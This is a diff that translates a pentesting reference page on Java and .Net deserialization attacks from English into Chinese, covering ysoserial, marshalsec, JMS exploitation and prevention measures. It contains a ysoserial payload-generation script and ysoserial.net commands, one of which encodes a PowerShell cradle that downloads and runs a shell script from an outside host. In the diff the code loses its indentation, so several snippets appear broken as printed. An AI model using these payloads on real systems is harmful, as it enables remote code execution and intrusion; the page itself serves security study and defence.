+在为 **java.lang.Runtime.exec()** 创建有效负载时，您 **不能使用特殊字符**，如 ">" 或 "|" 来重定向执行的输出，不能使用 "$()" 来执行命令，甚至不能 **通过空格分隔** 来传递参数给命令（您可以执行 `echo -n "hello world"`，但不能执行 `python2 -c 'print "Hello world"'`）。为了正确编码有效负载，您可以 [使用这个网页](http://www.jackson-t.ca/runtime-exec-payloads.html)。
 
-When creating a payload for **java.lang.Runtime.exec()** you **cannot use special characters** like ">" or "|" to redirect the output of an execution, "$()" to execute commands or even **pass arguments** to a command separated by **spaces** (you can do `echo -n "hello world"` but you can't do `python2 -c 'print "Hello world"'`). In order to encode correctly the payload you could [use this webpage](http://www.jackson-t.ca/runtime-exec-payloads.html).
-
-Feel free to use the next script to create **all the possible code execution** payloads for Windows and Linux and then test them on the vulnerable web page:
-
+请随意使用下一个脚本来创建 **所有可能的代码执行** 有效负载，适用于 Windows 和 Linux，然后在易受攻击的网页上进行测试：
 ```python
 import os
 import base64
@@ -469,243 +440,227 @@ import base64
 # You may need to update the payloads
 payloads = ['BeanShell1', 'Clojure', 'CommonsBeanutils1', 'CommonsCollections1', 'CommonsCollections2', 'CommonsCollections3', 'CommonsCollections4', 'CommonsCollections5', 'CommonsCollections6', 'CommonsCollections7', 'Groovy1', 'Hibernate1', 'Hibernate2', 'JBossInterceptors1', 'JRMPClient', 'JSON1', 'JavassistWeld1', 'Jdk7u21', 'MozillaRhino1', 'MozillaRhino2', 'Myfaces1', 'Myfaces2', 'ROME', 'Spring1', 'Spring2', 'Vaadin1', 'Wicket1']
 def generate(name, cmd):
-    for payload in payloads:
-        final = cmd.replace('REPLACE', payload)
-        print 'Generating ' + payload + ' for ' + name + '...'
-        command = os.popen('java -jar ysoserial.jar ' + payload + ' "' + final + '"')
-        result = command.read()
-        command.close()
-        encoded = base64.b64encode(result)
-        if encoded != "":
-            open(name + '_intruder.txt', 'a').write(encoded + '\n')
+for payload in payloads:
+final = cmd.replace('REPLACE', payload)
+print 'Generating ' + payload + ' for ' + name + '...'
+command = os.popen('java -jar ysoserial.jar ' + payload + ' "' + final + '"')
+result = command.read()
+command.close()
+encoded = base64.b64encode(result)
+if encoded != "":
+open(name + '_intruder.txt', 'a').write(encoded + '\n')
 
 generate('Windows', 'ping -n 1 win.REPLACE.server.local')
 generate('Linux', 'ping -c 1 nix.REPLACE.server.local')
 ```
-
 #### serialkillerbypassgadgets
 
-You can **use** [**https://github.com/pwntester/SerialKillerBypassGadgetCollection**](https://github.com/pwntester/SerialKillerBypassGadgetCollection) **along with ysoserial to create more exploits**. More information about this tool in the **slides of the talk** where the tool was presented: [https://es.slideshare.net/codewhitesec/java-deserialization-vulnerabilities-the-forgotten-bug-class?next_slideshow=1](https://es.slideshare.net/codewhitesec/java-deserialization-vulnerabilities-the-forgotten-bug-class?next_slideshow=1)
+您可以**使用** [**https://github.com/pwntester/SerialKillerBypassGadgetCollection**](https://github.com/pwntester/SerialKillerBypassGadgetCollection) **与 ysoserial 一起创建更多漏洞利用**。有关此工具的更多信息，请参见**演讲的幻灯片**，该工具在其中介绍：[https://es.slideshare.net/codewhitesec/java-deserialization-vulnerabilities-the-forgotten-bug-class?next_slideshow=1](https://es.slideshare.net/codewhitesec/java-deserialization-vulnerabilities-the-forgotten-bug-class?next_slideshow=1)
 
 #### marshalsec
 
-[**marshalsec** ](https://github.com/mbechler/marshalsec)can be used to generate payloads to exploit different **Json** and **Yml** serialization libraries in Java.\
-In order to compile the project I needed to **add** this **dependencies** to `pom.xml`:
-
+[**marshalsec** ](https://github.com/mbechler/marshalsec)可用于生成有效载荷，以利用 Java 中不同的**Json**和**Yml**序列化库。\
+为了编译该项目，我需要**添加**这些**依赖项**到 `pom.xml`：
 ```markup
 <dependency>
-		<groupId>javax.activation</groupId>
-		<artifactId>activation</artifactId>
-		<version>1.1.1</version>
+<groupId>javax.activation</groupId>
+<artifactId>activation</artifactId>
+<version>1.1.1</version>
 </dependency>
 
 <dependency>
-		<groupId>com.sun.jndi</groupId>
-		<artifactId>rmiregistry</artifactId>
-		<version>1.2.1</version>
-		<type>pom</type>
+<groupId>com.sun.jndi</groupId>
+<artifactId>rmiregistry</artifactId>
+<version>1.2.1</version>
+<type>pom</type>
 </dependency>
 ```
-
-**Install maven**, and **compile** the project:
-
+**安装 maven**，并 **编译** 项目：
 ```bash
 sudo apt-get install maven
 mvn clean package -DskipTests
 ```
-
 #### FastJSON
 
-Read more about this Java JSON library: [https://www.alphabot.com/security/blog/2020/java/Fastjson-exceptional-deserialization-vulnerabilities.html](https://www.alphabot.com/security/blog/2020/java/Fastjson-exceptional-deserialization-vulnerabilities.html)
+阅读更多关于这个Java JSON库的信息: [https://www.alphabot.com/security/blog/2020/java/Fastjson-exceptional-deserialization-vulnerabilities.html](https://www.alphabot.com/security/blog/2020/java/Fastjson-exceptional-deserialization-vulnerabilities.html)
 
 ### Labs
 
-- If you want to test some ysoserial payloads you can **run this webapp**: [https://github.com/hvqzao/java-deserialize-webapp](https://github.com/hvqzao/java-deserialize-webapp)
+- 如果你想测试一些ysoserial有效载荷，你可以**运行这个webapp**: [https://github.com/hvqzao/java-deserialize-webapp](https://github.com/hvqzao/java-deserialize-webapp)
 - [https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/](https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/)
 
 ### Why
 
-Java uses a lot serialization for various purposes like:
+Java在各种目的上使用了大量的序列化，例如：
 
-- **HTTP requests**: Serialization is widely employed in the management of parameters, ViewState, cookies, etc.
-- **RMI (Remote Method Invocation)**: The Java RMI protocol, which relies entirely on serialization, is a cornerstone for remote communication in Java applications.
-- **RMI over HTTP**: This method is commonly used by Java-based thick client web applications, utilizing serialization for all object communications.
-- **JMX (Java Management Extensions)**: JMX utilizes serialization for transmitting objects over the network.
-- **Custom Protocols**: In Java, the standard practice involves the transmission of raw Java objects, which will be demonstrated in upcoming exploit examples.
+- **HTTP请求**: 序列化广泛应用于参数、ViewState、cookies等的管理。
+- **RMI (远程方法调用)**: Java RMI协议完全依赖于序列化，是Java应用程序中远程通信的基石。
+- **RMI over HTTP**: 这种方法通常被基于Java的厚客户端web应用程序使用，利用序列化进行所有对象通信。
+- **JMX (Java管理扩展)**: JMX利用序列化在网络上传输对象。
+- **自定义协议**: 在Java中，标准做法涉及传输原始Java对象，这将在即将到来的利用示例中演示。
 
 ### Prevention
 
 #### Transient objects
 
-A class that implements `Serializable` can implement as `transient` any object inside the class that shouldn't be serializable. For example:
-
+一个实现了`Serializable`的类可以将类内任何不应该被序列化的对象实现为`transient`。例如：
 ```java
 public class myAccount implements Serializable
 {
-    private transient double profit; // declared transient
-    private transient double margin; // declared transient
+private transient double profit; // declared transient
+private transient double margin; // declared transient
 ```
+#### 避免序列化需要实现 Serializable 的类
 
-#### Avoid Serialization of a class that need to implements Serializable
-
-In scenarios where certain **objects must implement the `Serializable`** interface due to class hierarchy, there's a risk of unintentional deserialization. To prevent this, ensure these objects are non-deserializable by defining a `final` `readObject()` method that consistently throws an exception, as shown below:
-
+在某些 **对象必须实现 `Serializable`** 接口的场景中，由于类层次结构，存在无意反序列化的风险。为防止这种情况，确保这些对象是不可反序列化的，通过定义一个始终抛出异常的 `final` `readObject()` 方法，如下所示：
 ```java
 private final void readObject(ObjectInputStream in) throws java.io.IOException {
-    throw new java.io.IOException("Cannot be deserialized");
+throw new java.io.IOException("Cannot be deserialized");
 }
 ```
+#### **增强 Java 中的反序列化安全性**
 
-#### **Enhancing Deserialization Security in Java**
+**自定义 `java.io.ObjectInputStream`** 是保护反序列化过程的实用方法。当满足以下条件时，此方法适用：
 
-**Customizing `java.io.ObjectInputStream`** is a practical approach for securing deserialization processes. This method is suitable when:
-
-- The deserialization code is under your control.
-- The classes expected for deserialization are known.
-
-Override the **`resolveClass()`** method to limit deserialization to allowed classes only. This prevents deserialization of any class except those explicitly permitted, such as in the following example that restricts deserialization to the `Bicycle` class only:
+- 反序列化代码在您的控制之下。
+- 预期反序列化的类是已知的。
 
+重写 **`resolveClass()`** 方法以限制反序列化仅限于允许的类。这可以防止反序列化任何类，除了那些明确允许的类，例如以下示例仅限制反序列化为 `Bicycle` 类：
 ```java
 // Code from https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html
 public class LookAheadObjectInputStream extends ObjectInputStream {
 
-    public LookAheadObjectInputStream(InputStream inputStream) throws IOException {
-        super(inputStream);
-    }
+public LookAheadObjectInputStream(InputStream inputStream) throws IOException {
+super(inputStream);
+}
 
-    /**
-    * Only deserialize instances of our expected Bicycle class
-    */
-    @Override
-    protected Class<?> resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException {
-        if (!desc.getName().equals(Bicycle.class.getName())) {
-            throw new InvalidClassException("Unauthorized deserialization attempt", desc.getName());
-        }
-        return super.resolveClass(desc);
-    }
+/**
+* Only deserialize instances of our expected Bicycle class
+*/
+@Override
+protected Class<?> resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException {
+if (!desc.getName().equals(Bicycle.class.getName())) {
+throw new InvalidClassException("Unauthorized deserialization attempt", desc.getName());
+}
+return super.resolveClass(desc);
+}
 }
 ```
-
-**Using a Java Agent for Security Enhancement** offers a fallback solution when code modification isn't possible. This method applies mainly for **blacklisting harmful classes**, using a JVM parameter:
-
+**使用 Java 代理增强安全性** 提供了一种在无法修改代码时的备用解决方案。此方法主要适用于 **黑名单有害类**，使用 JVM 参数：
 ```
 -javaagent:name-of-agent.jar
 ```
+它提供了一种动态保护反序列化的方法，适用于立即代码更改不切实际的环境。
 
-It provides a way to secure deserialization dynamically, ideal for environments where immediate code changes are impractical.
+查看 [rO0 by Contrast Security](https://github.com/Contrast-Security-OSS/contrast-rO0) 中的示例
 
-Check and example in [rO0 by Contrast Security](https://github.com/Contrast-Security-OSS/contrast-rO0)
-
-**Implementing Serialization Filters**: Java 9 introduced serialization filters via the **`ObjectInputFilter`** interface, providing a powerful mechanism for specifying criteria that serialized objects must meet before being deserialized. These filters can be applied globally or per stream, offering a granular control over the deserialization process.
-
-To utilize serialization filters, you can set a global filter that applies to all deserialization operations or configure it dynamically for specific streams. For example:
+**实现序列化过滤器**：Java 9 通过 **`ObjectInputFilter`** 接口引入了序列化过滤器，提供了一种强大的机制，用于指定反序列化之前序列化对象必须满足的标准。这些过滤器可以全局应用或按流应用，提供对反序列化过程的细粒度控制。
 
+要使用序列化过滤器，您可以设置一个适用于所有反序列化操作的全局过滤器，或为特定流动态配置它。例如：
 ```java
 ObjectInputFilter filter = info -> {
-    if (info.depth() > MAX_DEPTH) return Status.REJECTED; // Limit object graph depth
-    if (info.references() > MAX_REFERENCES) return Status.REJECTED; // Limit references
-    if (info.serialClass() != null && !allowedClasses.contains(info.serialClass().getName())) {
-        return Status.REJECTED; // Restrict to allowed classes
-    }
-    return Status.ALLOWED;
+if (info.depth() > MAX_DEPTH) return Status.REJECTED; // Limit object graph depth
+if (info.references() > MAX_REFERENCES) return Status.REJECTED; // Limit references
+if (info.serialClass() != null && !allowedClasses.contains(info.serialClass().getName())) {
+return Status.REJECTED; // Restrict to allowed classes
+}
+return Status.ALLOWED;
 };
 ObjectInputFilter.Config.setSerialFilter(filter);
 ```
+**利用外部库增强安全性**：像**NotSoSerial**、**jdeserialize**和**Kryo**这样的库提供了控制和监控Java反序列化的高级功能。这些库可以提供额外的安全层，例如白名单或黑名单类、在反序列化之前分析序列化对象，以及实现自定义序列化策略。
 
-**Leveraging External Libraries for Enhanced Security**: Libraries such as **NotSoSerial**, **jdeserialize**, and **Kryo** offer advanced features for controlling and monitoring Java deserialization. These libraries can provide additional layers of security, such as whitelisting or blacklisting classes, analyzing serialized objects before deserialization, and implementing custom serialization strategies.
+- **NotSoSerial**拦截反序列化过程，以防止执行不受信任的代码。
+- **jdeserialize**允许在不反序列化的情况下分析序列化的Java对象，帮助识别潜在的恶意内容。
+- **Kryo**是一个替代的序列化框架，强调速度和效率，提供可配置的序列化策略，可以增强安全性。
 
-- **NotSoSerial** intercepts deserialization processes to prevent execution of untrusted code.
-- **jdeserialize** allows for the analysis of serialized Java objects without deserializing them, helping identify potentially malicious content.
-- **Kryo** is an alternative serialization framework that emphasizes speed and efficiency, offering configurable serialization strategies that can enhance security.
-
-### References
+### 参考文献
 
 - [https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html)
-- Deserialization and ysoserial talk: [http://frohoff.github.io/appseccali-marshalling-pickles/](http://frohoff.github.io/appseccali-marshalling-pickles/)
+- 反序列化和ysoserial讲座：[http://frohoff.github.io/appseccali-marshalling-pickles/](http://frohoff.github.io/appseccali-marshalling-pickles/)
 - [https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/](https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/)
 - [https://www.youtube.com/watch?v=VviY3O-euVQ](https://www.youtube.com/watch?v=VviY3O-euVQ)
-- Talk about gadgetinspector: [https://www.youtube.com/watch?v=wPbW6zQ52w8](https://www.youtube.com/watch?v=wPbW6zQ52w8) and slides: [https://i.blackhat.com/us-18/Thu-August-9/us-18-Haken-Automated-Discovery-of-Deserialization-Gadget-Chains.pdf](https://i.blackhat.com/us-18/Thu-August-9/us-18-Haken-Automated-Discovery-of-Deserialization-Gadget-Chains.pdf)
-- Marshalsec paper: [https://www.github.com/mbechler/marshalsec/blob/master/marshalsec.pdf?raw=true](https://www.github.com/mbechler/marshalsec/blob/master/marshalsec.pdf?raw=true)
+- 讲座关于gadgetinspector：[https://www.youtube.com/watch?v=wPbW6zQ52w8](https://www.youtube.com/watch?v=wPbW6zQ52w8)和幻灯片：[https://i.blackhat.com/us-18/Thu-August-9/us-18-Haken-Automated-Discovery-of-Deserialization-Gadget-Chains.pdf](https://i.blackhat.com/us-18/Thu-August-9/us-18-Haken-Automated-Discovery-of-Deserialization-Gadget-Chains.pdf)
+- Marshalsec论文：[https://www.github.com/mbechler/marshalsec/blob/master/marshalsec.pdf?raw=true](https://www.github.com/mbechler/marshalsec/blob/master/marshalsec.pdf?raw=true)
 - [https://dzone.com/articles/why-runtime-compartmentalization-is-the-most-compr](https://dzone.com/articles/why-runtime-compartmentalization-is-the-most-compr)
 - [https://deadcode.me/blog/2016/09/02/Blind-Java-Deserialization-Commons-Gadgets.html](https://deadcode.me/blog/2016/09/02/Blind-Java-Deserialization-Commons-Gadgets.html)
 - [https://deadcode.me/blog/2016/09/18/Blind-Java-Deserialization-Part-II.html](https://deadcode.me/blog/2016/09/18/Blind-Java-Deserialization-Part-II.html)
-- Java and .Net JSON deserialization **paper:** [**https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf**](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf)**,** talk: [https://www.youtube.com/watch?v=oUAeWhW5b8c](https://www.youtube.com/watch?v=oUAeWhW5b8c) and slides: [https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf)
-- Deserialziations CVEs: [https://paper.seebug.org/123/](https://paper.seebug.org/123/)
+- Java和.Net JSON反序列化**论文：**[**https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf**](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf)**，**讲座：[https://www.youtube.com/watch?v=oUAeWhW5b8c](https://www.youtube.com/watch?v=oUAeWhW5b8c)和幻灯片：[https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf)
+- 反序列化CVE：[https://paper.seebug.org/123/](https://paper.seebug.org/123/)
 
-## JNDI Injection & log4Shell
+## JNDI注入与log4Shell
 
-Find whats is **JNDI Injection, how to abuse it via RMI, CORBA & LDAP and how to exploit log4shell** (and example of this vuln) in the following page:
+查找**JNDI注入，如何通过RMI、CORBA和LDAP滥用它以及如何利用log4shell**（以及此漏洞的示例）在以下页面：
 
 {{#ref}}
 jndi-java-naming-and-directory-interface-and-log4shell.md
 {{#endref}}
 
-## JMS - Java Message Service
+## JMS - Java消息服务
 
-> The **Java Message Service** (**JMS**) API is a Java message-oriented middleware API for sending messages between two or more clients. It is an implementation to handle the producer–consumer problem. JMS is a part of the Java Platform, Enterprise Edition (Java EE), and was defined by a specification developed at Sun Microsystems, but which has since been guided by the Java Community Process. It is a messaging standard that allows application components based on Java EE to create, send, receive, and read messages. It allows the communication between different components of a distributed application to be loosely coupled, reliable, and asynchronous. (From [Wikipedia](https://en.wikipedia.org/wiki/Java_Message_Service)).
+> **Java消息服务**（**JMS**）API是一个Java面向消息的中间件API，用于在两个或多个客户端之间发送消息。它是处理生产者-消费者问题的实现。JMS是Java平台企业版（Java EE）的一部分，由Sun Microsystems开发的规范定义，但此后由Java社区过程指导。它是一种消息标准，允许基于Java EE的应用程序组件创建、发送、接收和读取消息。它允许分布式应用程序的不同组件之间的通信是松耦合、可靠和异步的。（来自[维基百科](https://en.wikipedia.org/wiki/Java_Message_Service)）。
 
-### Products
+### 产品
 
-There are several products using this middleware to send messages:
+有几个产品使用此中间件发送消息：
 
 ![https://www.blackhat.com/docs/us-16/materials/us-16-Kaiser-Pwning-Your-Java-Messaging-With-Deserialization-Vulnerabilities.pdf](<../../images/image (314).png>)
 
 ![https://www.blackhat.com/docs/us-16/materials/us-16-Kaiser-Pwning-Your-Java-Messaging-With-Deserialization-Vulnerabilities.pdf](<../../images/image (1056).png>)
 
-### Exploitation
+### 利用
 
-So, basically there are a **bunch of services using JMS on a dangerous way**. Therefore, if you have **enough privileges** to send messages to this services (usually you will need valid credentials) you could be able to send **malicious objects serialized that will be deserialized by the consumer/subscriber**.\
-This means that in this exploitation all the **clients that are going to use that message will get infected**.
+所以，基本上有**一堆服务以危险的方式使用JMS**。因此，如果您有**足够的权限**向这些服务发送消息（通常您需要有效的凭据），您将能够发送**恶意序列化对象，这些对象将被消费者/订阅者反序列化**。\
+这意味着在此利用中，所有**将使用该消息的客户端将被感染**。
 
-You should remember that even if a service is vulnerable (because it's insecurely deserializing user input) you still need to find valid gadgets to exploit the vulnerability.
+您应该记住，即使服务存在漏洞（因为它不安全地反序列化用户输入），您仍然需要找到有效的gadget来利用该漏洞。
 
-The tool [JMET](https://github.com/matthiaskaiser/jmet) was created to **connect and attack this services sending several malicious objects serialized using known gadgets**. These exploits will work if the service is still vulnerable and if any of the used gadgets is inside the vulnerable application.
+工具[JMET](https://github.com/matthiaskaiser/jmet)被创建用于**连接和攻击这些服务，发送多个使用已知gadget序列化的恶意对象**。这些利用将在服务仍然存在漏洞且任何使用的gadget在易受攻击的应用程序中时有效。
 
-### References
+### 参考文献
 
-- JMET talk: [https://www.youtube.com/watch?v=0h8DWiOWGGA](https://www.youtube.com/watch?v=0h8DWiOWGGA)
-- Slides: [https://www.blackhat.com/docs/us-16/materials/us-16-Kaiser-Pwning-Your-Java-Messaging-With-Deserialization-Vulnerabilities.pdf](https://www.blackhat.com/docs/us-16/materials/us-16-Kaiser-Pwning-Your-Java-Messaging-With-Deserialization-Vulnerabilities.pdf)
+- JMET讲座：[https://www.youtube.com/watch?v=0h8DWiOWGGA](https://www.youtube.com/watch?v=0h8DWiOWGGA)
+- 幻灯片：[https://www.blackhat.com/docs/us-16/materials/us-16-Kaiser-Pwning-Your-Java-Messaging-With-Deserialization-Vulnerabilities.pdf](https://www.blackhat.com/docs/us-16/materials/us-16-Kaiser-Pwning-Your-Java-Messaging-With-Deserialization-Vulnerabilities.pdf)
 
 ## .Net
 
-In the context of .Net, deserialization exploits operate in a manner akin to those found in Java, where gadgets are exploited to run specific code during the deserialization of an object.
+在.Net的上下文中，反序列化利用以类似于Java的方式操作，其中gadget被利用以在反序列化对象时运行特定代码。
 
-### Fingerprint
+### 指纹
 
-#### WhiteBox
+#### 白盒
 
-The source code should be inspected for occurrences of:
+应检查源代码中是否存在以下情况：
 
 1. `TypeNameHandling`
 2. `JavaScriptTypeResolver`
 
-The focus should be on serializers that permit the type to be determined by a variable under user control.
+重点应放在允许通过用户控制的变量确定类型的序列化器上。
 
-#### BlackBox
+#### 黑盒
 
-The search should target the Base64 encoded string **AAEAAAD/////** or any similar pattern that might undergo deserialization on the server-side, granting control over the type to be deserialized. This could include, but is not limited to, **JSON** or **XML** structures featuring `TypeObject` or `$type`.
+搜索应针对Base64编码字符串**AAEAAAD/////**或任何可能在服务器端进行反序列化的类似模式，从而控制要反序列化的类型。这可能包括但不限于包含`TypeObject`或`$type`的**JSON**或**XML**结构。
 
 ### ysoserial.net
 
-In this case you can use the tool [**ysoserial.net**](https://github.com/pwntester/ysoserial.net) in order to **create the deserialization exploits**. Once downloaded the git repository you should **compile the tool** using Visual Studio for example.
+在这种情况下，您可以使用工具[**ysoserial.net**](https://github.com/pwntester/ysoserial.net)来**创建反序列化利用**。下载git存储库后，您应使用Visual Studio等编译该工具。
 
-If you want to learn about **how does ysoserial.net creates it's exploit** you can [**check this page where is explained the ObjectDataProvider gadget + ExpandedWrapper + Json.Net formatter**](basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md).
+如果您想了解**ysoserial.net是如何创建其利用的**，您可以[**查看此页面，其中解释了ObjectDataProvider gadget + ExpandedWrapper + Json.Net格式化程序**](basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md)。
 
-The main options of **ysoserial.net** are: **`--gadget`**, **`--formatter`**, **`--output`** and **`--plugin`.**
+**ysoserial.net**的主要选项有：**`--gadget`**、**`--formatter`**、**`--output`**和**`--plugin`**。
 
-- **`--gadget`** used to indicate the gadget to abuse (indicate the class/function that will be abused during deserialization to execute commands).
-- **`--formatter`**, used to indicated the method to serialized the exploit (you need to know which library is using the back-end to deserialize the payload and use the same to serialize it)
-- **`--output`** used to indicate if you want the exploit in **raw** or **base64** encoded. _Note that **ysoserial.net** will **encode** the payload using **UTF-16LE** (encoding used by default on Windows) so if you get the raw and just encode it from a linux console you might have some **encoding compatibility problems** that will prevent the exploit from working properly (in HTB JSON box the payload worked in both UTF-16LE and ASCII but this doesn't mean it will always work)._
-- **`--plugin`** ysoserial.net supports plugins to craft **exploits for specific frameworks** like ViewState
+- **`--gadget`**用于指示要滥用的gadget（指示在反序列化期间将被滥用以执行命令的类/函数）。
+- **`--formatter`**，用于指示序列化利用的方法（您需要知道后端使用哪个库来反序列化有效负载，并使用相同的库进行序列化）
+- **`--output`**用于指示您希望以**原始**或**base64**编码的形式获得利用。_请注意，**ysoserial.net**将使用**UTF-16LE**（Windows上默认使用的编码）对有效负载进行**编码**，因此如果您从Linux控制台获取原始数据并仅对其进行编码，您可能会遇到一些**编码兼容性问题**，这将导致利用无法正常工作（在HTB JSON框中，有效负载在UTF-16LE和ASCII中均有效，但这并不意味着它总是有效）。_
+- **`--plugin`**ysoserial.net支持插件以制作**特定框架的利用**，如ViewState
 
-#### More ysoserial.net parameters
+#### 更多ysoserial.net参数
 
-- `--minify` will provide a **smaller payload** (if possible)
-- `--raf -f Json.Net -c "anything"` This will indicate all the gadgets that can be used with a provided formatter (`Json.Net` in this case)
-- `--sf xml` you can **indicate a gadget** (`-g`)and ysoserial.net will search for formatters containing "xml" (case insensitive)
-
-**ysoserial examples** to create exploits:
+- `--minify`将提供一个**更小的有效负载**（如果可能）
+- `--raf -f Json.Net -c "anything"`这将指示可以与提供的格式化程序（在这种情况下为`Json.Net`）一起使用的所有gadget
+- `--sf xml`您可以**指示一个gadget**（`-g`），ysoserial.net将搜索包含“xml”的格式化程序（不区分大小写）
 
+**ysoserial示例**以创建利用：
 ```bash
 #Send ping
 ysoserial.exe -g ObjectDataProvider -f Json.Net -c "ping -n 5 10.10.14.44" -o base64
@@ -723,86 +678,80 @@ echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.44/shell.
 #Create exploit using the created B64 shellcode
 ysoserial.exe -g ObjectDataProvider -f Json.Net -c "powershell -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADQANAAvAHMAaABlAGwAbAAuAHAAcwAxACcAKQA=" -o base64
 ```
-
-**ysoserial.net** has also a **very interesting parameter** that helps to understand better how every exploit works: `--test`\
-If you indicates this parameter **ysoserial.net** will **try** the **exploit locally,** so you can test if your payload will work correctly.\
-This parameter is helpful because if you review the code you will find chucks of code like the following one (from [ObjectDataProviderGenerator.cs](https://github.com/pwntester/ysoserial.net/blob/c53bd83a45fb17eae60ecc82f7147b5c04b07e42/ysoserial/Generators/ObjectDataProviderGenerator.cs#L208)):
-
+**ysoserial.net** 还有一个 **非常有趣的参数**，可以更好地理解每个漏洞是如何工作的： `--test`\
+如果您指明此参数，**ysoserial.net** 将 **尝试** 在 **本地利用漏洞，** 这样您可以测试您的有效载荷是否能正常工作。\
+这个参数很有帮助，因为如果您查看代码，您会发现像以下这样的代码块（来自 [ObjectDataProviderGenerator.cs](https://github.com/pwntester/ysoserial.net/blob/c53bd83a45fb17eae60ecc82f7147b5c04b07e42/ysoserial/Generators/ObjectDataProviderGenerator.cs#L208)）：
 ```java
-            if (inputArgs.Test)
-                {
-                    try
-                    {
-                        SerializersHelper.JsonNet_deserialize(payload);
-                    }
-                    catch (Exception err)
-                    {
-                        Debugging.ShowErrors(inputArgs, err);
-                    }
-                }
+if (inputArgs.Test)
+{
+try
+{
+SerializersHelper.JsonNet_deserialize(payload);
+}
+catch (Exception err)
+{
+Debugging.ShowErrors(inputArgs, err);
+}
+}
 ```
-
-This means that in order to test the exploit the code will call [serializersHelper.JsonNet_deserialize](https://github.com/pwntester/ysoserial.net/blob/c53bd83a45fb17eae60ecc82f7147b5c04b07e42/ysoserial/Helpers/SerializersHelper.cs#L539)
-
+这意味着为了测试漏洞，代码将调用 [serializersHelper.JsonNet_deserialize](https://github.com/pwntester/ysoserial.net/blob/c53bd83a45fb17eae60ecc82f7147b5c04b07e42/ysoserial/Helpers/SerializersHelper.cs#L539)
 ```java
 public static object JsonNet_deserialize(string str)
-    {
-        Object obj = JsonConvert.DeserializeObject<Object>(str, new JsonSerializerSettings
-        {
-            TypeNameHandling = TypeNameHandling.Auto
-        });
-        return obj;
-    }
+{
+Object obj = JsonConvert.DeserializeObject<Object>(str, new JsonSerializerSettings
+{
+TypeNameHandling = TypeNameHandling.Auto
+});
+return obj;
+}
 ```
-
-In the **previous code is vulnerable to the exploit created**. So if you find something similar in a .Net application it means that probably that application is vulnerable too.\
-Therefore the **`--test`** parameter allows us to understand **which chunks of code are vulnerable** to the desrialization exploit that **ysoserial.net** can create.
+在**之前的代码易受创建的漏洞影响**。因此，如果您在 .Net 应用程序中发现类似的内容，这意味着该应用程序可能也存在漏洞。\
+因此，**`--test`** 参数使我们能够理解**哪些代码块易受** **ysoserial.net** 可以创建的反序列化漏洞影响。
 
 ### ViewState
 
-Take a look to [this POST about **how to try to exploit the \_\_ViewState parameter of .Net** ](exploiting-__viewstate-parameter.md)to **execute arbitrary code.** If you **already know the secrets** used by the victim machine, [**read this post to know to execute code**](exploiting-__viewstate-knowing-the-secret.md)**.**
+查看[这篇关于**如何尝试利用 .Net 的 \_\_ViewState 参数**](exploiting-__viewstate-parameter.md)来**执行任意代码。** 如果您**已经知道受害者机器使用的秘密**，[**阅读这篇文章以了解如何执行代码**](exploiting-__viewstate-knowing-the-secret.md)**。**
 
-### Prevention
+### 预防
 
-To mitigate the risks associated with deserialization in .Net:
+为了减轻与 .Net 中反序列化相关的风险：
 
-- **Avoid allowing data streams to define their object types.** Utilize `DataContractSerializer` or `XmlSerializer` when possible.
-- **For `JSON.Net`, set `TypeNameHandling` to `None`:** %%%TypeNameHandling = TypeNameHandling.None%%%
-- **Avoid using `JavaScriptSerializer` with a `JavaScriptTypeResolver`.**
-- **Limit the types that can be deserialized**, understanding the inherent risks with .Net types, such as `System.IO.FileInfo`, which can modify server files' properties, potentially leading to denial of service attacks.
-- **Be cautious with types having risky properties**, like `System.ComponentModel.DataAnnotations.ValidationException` with its `Value` property, which can be exploited.
-- **Securely control type instantiation** to prevent attackers from influencing the deserialization process, rendering even `DataContractSerializer` or `XmlSerializer` vulnerable.
-- **Implement white list controls** using a custom `SerializationBinder` for `BinaryFormatter` and `JSON.Net`.
-- **Stay informed about known insecure deserialization gadgets** within .Net and ensure deserializers do not instantiate such types.
-- **Isolate potentially risky code** from code with internet access to avoid exposing known gadgets, such as `System.Windows.Data.ObjectDataProvider` in WPF applications, to untrusted data sources.
+- **避免允许数据流定义其对象类型。** 尽可能使用 `DataContractSerializer` 或 `XmlSerializer`。
+- **对于 `JSON.Net`，将 `TypeNameHandling` 设置为 `None`：** %%%TypeNameHandling = TypeNameHandling.None%%%
+- **避免使用带有 `JavaScriptTypeResolver` 的 `JavaScriptSerializer`。**
+- **限制可以被反序列化的类型，** 理解 .Net 类型的固有风险，例如 `System.IO.FileInfo`，它可以修改服务器文件的属性，可能导致拒绝服务攻击。
